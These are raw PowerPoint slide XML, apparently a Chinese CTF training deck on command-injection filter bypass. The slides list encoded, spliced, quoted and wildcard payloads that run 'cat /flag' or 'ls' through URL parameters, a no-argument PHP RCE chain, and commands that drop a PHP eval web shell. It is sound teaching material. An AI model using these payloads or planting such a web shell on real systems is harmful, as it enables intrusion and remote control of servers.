              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>echo MTIzCg==|base64 -d    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其将会打印</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>123         //MTIzCg==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>echo "Y2F0IC9mbGFn"|base64 -d|bash      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将执行了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cat /flag        //Y2F0IC9mbGFn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cat /flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>echo "bHM="|base64 -d|sh               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>echo "636174202f666c6167"|xxd -r -p|bash     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cat /flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>$(printf "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67")         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cat /flag        </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>{printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|$0       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cat /flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Oct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>$(printf "\154\163")       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）偶读拼写：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>?ip=127.0.0.1;a=l;b=s;$a$b</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）内敛执行：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>echo "a`pwd`"          #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>a/root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>?ip=127.0.0.1;cat$IFS$9`ls`</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72235" y="946785"/>
            <a:ext cx="10338435" cy="5573395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）引号绕过：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ca""t  =&gt;  cat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>mo""re  =&gt;  more</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>in""dex  =&gt;  index</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ph""p  =&gt;  php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）通配符绕过：假设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/?url=127.0.0.1|ca""t%09/fla?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/?url=127.0.0.1|ca""t%09/fla*</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）反斜杠绕过：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ca\t  =&gt;  cat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>mo\re  =&gt;  more</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>匹配绕过：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>c[a]t  =&gt;  cat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cat fl[a-z]g =&gt; cat flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- (11)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连接符绕过：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%0a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>回车</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    %0d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>换行</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92225" y="541020"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>绕过总结</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1445895" y="1524000"/>
            <a:ext cx="9276080" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、特殊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>符号</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  a=l;b=s;$a$b</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、各种编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进制，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>unicode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、解析差异</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  1 =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（也是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一种）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、运算</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>异或，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>取反</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9995" y="559435"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>无参</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1353185" y="1196340"/>
            <a:ext cx="9029065" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>指无法传入任何参数，只能使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数返回值作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1285240" y="2025015"/>
            <a:ext cx="9961245" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>highlight_file(current(array_reverse(scandir(pos(localeconv())))));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(scandir(pos(localeconv()))) = ls .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(current(array_reverse(scandir(pos(localeconv()))))) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>选中最后一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1353185" y="3961765"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>phpstorm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>演示</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59535" y="553085"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>练习时间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555625" y="5659120"/>
            <a:ext cx="10994390" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>忘了为什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>要写这些了（</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>echo "echo\$IFS\$1\"&lt;?php @eval(\\\$_POST['cmd']);?&gt;\"&gt;evil1.php"|base64  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>√</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"echo "&lt;?php @eval(\\\$_POST['cmd']);?&gt;\"&gt;evil1.php"|base64  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>×</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"echo \"1 2\""|base64  </a:t>
            </a:r>
